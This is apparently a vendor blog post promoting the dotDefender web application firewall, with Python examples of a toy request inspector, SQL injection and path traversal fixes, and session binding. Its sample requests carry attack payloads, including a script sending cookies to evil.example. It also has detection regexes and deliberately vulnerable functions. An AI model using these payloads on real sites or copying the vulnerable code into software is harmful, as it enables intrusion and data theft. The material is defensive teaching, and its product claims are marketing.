Thursday, January 20, 2011

Web Application Firewall

Reports have stated that over 80% of all web sites contain vulnerabilities that make them susceptible to Cross-Site Scripting, SQL Injection, Path Traversal and many other exploits, and many organizations have taken notice.

Most notable is the Payment Card Industry (PCI) Security Standards Council, which requires that, to be in compliance, a company that processes credit cards over the Internet must either, Option 1, have its public-facing web applications reviewed in a web application vulnerability assessment or, Option 2, implement a web application firewall in front of them.

PCI defines a web application firewall as:

“A security policy enforcement point positioned between a web application and the client end point. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components.”

Basically, a web application firewall, or WAF, protects web applications much as a traditional firewall protects a network: it controls the input to and output from the asset it protects, and who may access it. Traditional network firewalls, however, make their decisions from IP addresses, ports and protocol state without parsing the application payload, so they cannot protect the application layer. Even an Intrusion Prevention System (IPS) that matches signatures inside packets does not reassemble and decode HTTP requests the way the web server will, so it cannot reliably recognize the application-layer threats that make web applications vulnerable to attack. A device working at layers 3 and 4 simply has no awareness of the HTTP payload.

Unlike traditional firewalls, which usually block access to certain ports or filter by IP address, web application firewalls look at every request and response carried over HTTP and HTTPS, including web service protocols such as SOAP and XML-RPC. The meticulous inspection of web traffic that web application firewalls perform has also earned them the nickname “Deep Packet Inspection Firewalls”.
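To make the difference concrete, here is an added example (written for this page, not code from the original post or from any WAF vendor) that puts a port-based filter and a minimal HTTP-aware inspector side by side. The sample requests, host name, rule names and regular expressions are all constructed for the demonstration. The port filter sees only "traffic to port 80" and allows everything; the inspector parses the request line, headers, query string and form body, URL-decodes parameter values repeatedly (so a double-encoded `..%252F` is still recognized as `../`), and only then matches attack patterns, which is exactly the visibility a layer 3/4 device lacks.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample requests for the demonstration, not captured traffic.
_xss_body = (b"body=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%27"
             b"%2Bdocument.cookie%3C%2Fscript%3E")
SAMPLE_REQUESTS = [
    # benign product lookup
    b"GET /products?id=42 HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    # SQL injection in a query parameter:  42' OR 1=1--
    b"GET /products?id=42%27%20OR%201%3D1-- HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    # double URL-encoded path traversal: ..%252F decodes to ..%2F, then to ../
    b"GET /download?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    # cross-site scripting payload carried in a POST form body
    (b"POST /comment HTTP/1.1\r\nHost: shop.example\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n"
     b"Content-Length: " + str(len(_xss_body)).encode() + b"\r\n\r\n" + _xss_body),
]

# Illustrative attack patterns (hypothetical rule set, deliberately small).
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("sql-injection", re.compile(
        r"""['"]\s*(?:or|and)\s+[\w'"]+\s*=\s*[\w'"]+|union\s+select|--\s*$|;\s*drop\s+table""",
        re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("xss", re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.I)),
]


def port_filter_decision(dst_port: int, allowed_ports=(80, 443)) -> str:
    """What a layer 3/4 filter can decide: is this port open? Nothing about the payload."""
    return "allow" if dst_port in allowed_ports else "deny"


def normalize(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), defeating double encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request(raw: bytes) -> Dict[str, object]:
    """Split a raw HTTP/1.1 request into method, path, headers and decoded parameters."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return {"method": method, "path": url.path, "headers": headers, "params": params}


def waf_decision(raw: bytes) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Return ("allow" | "block", hits); each hit is (rule, location, decoded value)."""
    req = parse_request(raw)
    candidates = [("path", normalize(req["path"]))]
    candidates += [(f"param:{name}", normalize(value)) for name, value in req["params"]]
    hits = []
    for location, value in candidates:
        for rule_name, pattern in RULES:
            if pattern.search(value):
                hits.append((rule_name, location, value))
    return ("block" if hits else "allow"), hits


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        verdict, hits = waf_decision(raw)
        print(raw.split(b"\r\n")[0].decode(), "->", port_filter_decision(80), "/", verdict, hits)
```

All four requests arrive on port 80, so the port filter allows them all; the inspector allows only the first. The bounded decode loop matters: a single decode of the third request still leaves `..%2F`, which the traversal pattern would miss.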

Risks Associated with Web Applications

Falling out of PCI compliance may not be a concern for many web site owners. Many web sites simply don’t collect credit card data over the Internet and others rely on payment gateways like PayPal to handle all of their online transactions.

Unfortunately for any business or person who runs a web site, deploying any type of web application - even commercial applications or ones supported by a hosting provider - puts the web site at risk for the following:

* Web defacement and vandalism: using Path Traversal exploits, attackers can read files your visitors never see, the files and folders that exist outside of the web document root directory, such as configuration files and stored credentials; combined with an upload or file-write flaw, the same missing path checks let them overwrite the pages your visitors do see.
* Denial of Service attacks: by manipulating incoming web traffic, attackers can overload your web server or web applications, causing them to crash or slow to a crawl. Visitors who have come to your site to purchase products, read your content, or participate in the community will become discouraged when the site is unavailable, damaging your brand reputation and potentially costing sales.
* Stolen user information: using SQL Injection exploits, attackers can access any data stored in the databases that your web site relies on. Information like user accounts, user identities, and user credit cards can be stolen or manipulated. Cross-Site Scripting can also be used to trick users into giving up this information: by injecting malicious script into a vulnerable web site, attackers can present a fake login form so that visitors unknowingly send their credentials to the attacker.
* Stolen user sessions: using Cross-Site Scripting, attackers can read a legitimate user’s session ID (for example from the session cookie) and replay it to act as that user and access their information.
* Being flagged as malicious by search engines: various vulnerabilities found in many web sites allow attackers to inject spam links into a site. Sites vulnerable to Cross-Site Scripting can also be exploited to serve malicious scripts that deliver Trojan horses, keystroke loggers, adware, spyware, and other malware to visitors. Once the search engines become aware of sites serving spam or malware, they are flagged as malicious and their page ranking drops.
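Two of the risks above, SQL Injection and Path Traversal, come down to the same mistake: attacker-supplied text reaches a query or a file path without being kept in its place. The following is an added example, written for this page and not taken from the original post, that shows a vulnerable function beside its fixed form for each case. The in-memory SQLite table, the temporary directory layout, the file names and the sample payloads are all constructed for the demonstration.

```python
import os
import sqlite3
import tempfile
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a site's user database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO users (username, card_last4) VALUES (?, ?)",
                     [("alice", "4242"), ("bob", "1881")])
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # VULNERABLE: the user-supplied value becomes part of the SQL text, so a quote
    # in the input changes the query's structure instead of being compared as data.
    query = f"SELECT username, card_last4 FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_user_fixed(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # FIXED: a bound parameter is always treated as a value, never as SQL.
    query = "SELECT username, card_last4 FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def make_site() -> str:
    """Constructed layout: a document root holding one page, and a secret file outside it."""
    root = tempfile.mkdtemp()
    docroot = os.path.join(root, "public")
    os.makedirs(docroot)
    os.makedirs(os.path.join(root, "secret"))
    with open(os.path.join(docroot, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(root, "secret", "config.ini"), "w") as f:
        f.write("db_password=secret123")
    return docroot


def serve_file_vulnerable(docroot: str, requested: str) -> str:
    # VULNERABLE: os.path.join happily follows "../", so the request escapes docroot.
    with open(os.path.join(docroot, requested)) as f:
        return f.read()


def serve_file_fixed(docroot: str, requested: str) -> str:
    # FIXED: canonicalize both paths (resolving ".." and symlinks) and refuse anything
    # whose real location is not inside the document root. An absolute "requested"
    # path is rejected too, because os.path.join would otherwise discard the base.
    base = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{requested!r} resolves outside the document root")
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_user_vulnerable(conn, payload))  # every row leaks
    print("fixed:     ", lookup_user_fixed(conn, payload))       # no such user
    docroot = make_site()
    print("vulnerable:", serve_file_vulnerable(docroot, "../secret/config.ini"))
    try:
        serve_file_fixed(docroot, "../secret/config.ini")
    except PermissionError as e:
        print("fixed:     ", e)
```

The payload `' OR '1'='1` turns the vulnerable query into `WHERE username = '' OR '1'='1'`, which is true for every row; the bound version simply looks for a user literally named `' OR '1'='1`. Likewise `../secret/config.ini` walks out of the document root in the vulnerable file handler, while the fixed handler compares canonical paths and refuses.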

The truth is, any web application is at risk. Whether it is a commercial application or a Free/Open Source one, the potential for vulnerabilities exists. Once a vulnerability becomes known, attackers use well-coordinated, largely automated methods to seek out sites that are running the affected software and launch their attacks.

Preventing Web Application Attacks

Code reviews and vulnerability assessments are excellent ways to find and patch vulnerabilities in a web application. However, as solid as these two approaches are, they raise two concerns.

Cost

Both code reviews and vulnerability assessments can be rather costly. One way a company can defray some of these costs is to perform them in house, but this too may be expensive, as personnel usually have to be trained in the practice. Additionally, dedicating people to these tasks pulls them away from other duties, which smaller organizations may not be able to afford.

Zero-Day Exploits

Code reviews and vulnerability assessments work, but they are point-in-time exercises that can only find flaws that are known, or at least discoverable, when the review is done. Zero-day exploits target flaws for which no patch exists because the flaw has not yet been publicly seen. Even the best reviewers and auditors cannot see into the future, and a vulnerability introduced or discovered after the assessment is unaddressed until the next one.

Web Application Firewalls

Web application firewalls address the gaps left by code reviews and vulnerability assessments because they actively and continuously protect web applications against threats, using Pattern Recognition to detect and thwart zero-day exploits and other evolving threats, Session Protection to help prevent impersonation, and a Signature Knowledgebase to block known vulnerabilities and known attackers.

With the dotDefender web application firewall you can avoid many different threats to web applications: dotDefender inspects your HTTP traffic and checks each request against rules that allow or deny it based on its URL, headers, parameters and payload, rather than only on protocol, port or IP address, to stop web applications from being exploited.

Architected as plug-and-play software, dotDefender provides out-of-the-box protection against DoS threats, Cross-Site Scripting, SQL Injection attacks, path traversal and many other web attack techniques.

The reasons dotDefender is presented as a comprehensive solution for web application security are:

* Easy installation on Apache and IIS servers
* Strong security against known and emerging attacks
* Best-of-breed predefined security rules for instant protection
* Interface and API for managing multiple servers with ease
* Requires no additional hardware, and easily scales with your business

The Need to Avoid Attacks

Gartner research states that 75% of all attacks happen at the application layer. As more applications are designed to run in the browser, like Google Apps and the upcoming browser-based release of Microsoft Office, and more applications are designed to run in the cloud, the odds that a company’s data is exposed to these threats grow with each passing day.

Leaving data exposed like this is expensive. The TJX (TJ Maxx) breach, disclosed in 2007, reportedly cost the company between $500 million and $1 billion in lost income and fines. Add to this the reports that its stock fell roughly 66%, and it is easy to see that lost income is not the only way a compromised site can hurt a business’ bottom line. Small web sites are not immune to this threat. While they may not stand to have millions of dollars stolen, they are prime targets for cyber criminals who use these sites as launching pads for malware distribution and other scams. The sites that unknowingly host these criminals soon find their reputation ruined as they are flagged as malicious, and once their visitors are infected they rarely return.

Web application firewalls directly address these threats by examining incoming requests at the point where the web server processes them. A WAF that runs inside the web server therefore sees each request exactly as the web server sees it, after the server has parsed and decoded it, so encoding tricks that confuse a separate network device are already resolved, and it can stop a malicious attempt before the application handles it.

When looking for a web application firewall solution, it is important to keep certain criteria in mind:

* Does the WAF provide protection to applications running on both public facing web sites and internal web sites?
* Does it support multiple web server software and operating systems?
* Does it provide out-of-the-box protection?
* Does it update automatically?
* Does it integrate with other security systems?
* Is it easy to maintain?
* Is it easy to manage?

Protect Your Web Applications With dotDefender

dotDefender's security approach eliminates the need to learn the specific threats that exist in each web application. Rather than requiring a model of the application, the software analyzes each request and the impact it would have on the application. Its web application security is based on three engines: Pattern Recognition, Session Protection and Signature Knowledgebase.
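The page does not say how dotDefender's Session Protection engine works, so the following is an added example of one common approach to the problem it targets (the stolen-session risk listed earlier), not the vendor's implementation: the protection layer issues its own session cookie whose value is an HMAC-signed token bound to a fingerprint of the client, and rejects a token that is tampered with, expired, or presented from a client that does not match. The key, fingerprint inputs, field layout and sample client values are all assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional, Tuple

# Assumed server-side signing key for the example; a real deployment would load it
# from a secrets store and rotate it.
SECRET_KEY = b"example-only-signing-key-replace-me"


def client_fingerprint(client_ip: str, user_agent: str) -> str:
    """Hash of the client attributes the token is bound to (assumed choice of inputs)."""
    return hashlib.sha256(f"{client_ip}|{user_agent}".encode()).hexdigest()[:16]


def issue_session(client_ip: str, user_agent: str, issued_at: Optional[int] = None) -> str:
    """Create a token: <random id>.<issue time>.<client fingerprint>.<HMAC tag>."""
    session_id = secrets.token_hex(16)
    issued_at = int(time.time()) if issued_at is None else int(issued_at)
    payload = f"{session_id}.{issued_at}.{client_fingerprint(client_ip, user_agent)}"
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_session(cookie: str, client_ip: str, user_agent: str,
                   now: Optional[float] = None, max_age: int = 3600) -> Tuple[bool, str]:
    """Return (accepted, reason). Checks run signature first so nothing unsigned is trusted."""
    try:
        session_id, issued_str, fingerprint, tag = cookie.split(".")
        issued_at = int(issued_str)
    except ValueError:
        return False, "malformed"
    payload = f"{session_id}.{issued_at}.{fingerprint}"
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return False, "bad-signature"
    now = time.time() if now is None else now
    if now - issued_at > max_age:
        return False, "expired"
    if fingerprint != client_fingerprint(client_ip, user_agent):
        # A valid token replayed from a different client, the stolen-session case.
        return False, "client-mismatch"
    return True, "ok"


if __name__ == "__main__":
    # Constructed client values for the demonstration.
    cookie = issue_session("203.0.113.5", "Mozilla/5.0 (example)")
    print(verify_session(cookie, "203.0.113.5", "Mozilla/5.0 (example)"))   # (True, 'ok')
    print(verify_session(cookie, "198.51.100.7", "Mozilla/5.0 (example)"))  # (False, 'client-mismatch')
```

The caveat a practitioner should keep in mind: the fingerprint inputs are weak binding. Legitimate users change IP addresses behind mobile carriers and corporate NATs, and the User-Agent header is chosen by the attacker, so a stolen cookie replayed from the same network with a copied User-Agent still passes. Binding raises the cost of replay; it does not replace preventing the theft in the first place (HttpOnly and Secure cookie flags, and fixing the Cross-Site Scripting flaw that leaks the cookie).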

The Pattern Recognition engine employed by dotDefender protects against malicious behavior such as the attacks mentioned above, and many others. The patterns are regular expression-based and designed to identify a wide array of application-level attack methods efficiently and accurately, and the vendor cites a very low false positive rate as a result. As with any regex-based rule set, it is still worth running the rules in a monitoring mode against real traffic before blocking, since legitimate input such as a forum comment quoting SQL or HTML can match an attack pattern.

What sets dotDefender apart is that it offers comprehensive protection against threats to web applications while being one of the easiest solutions to use.

In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the-box protection that is managed through a browser-based interface, with what the vendor describes as virtually no impact on server or web site performance.
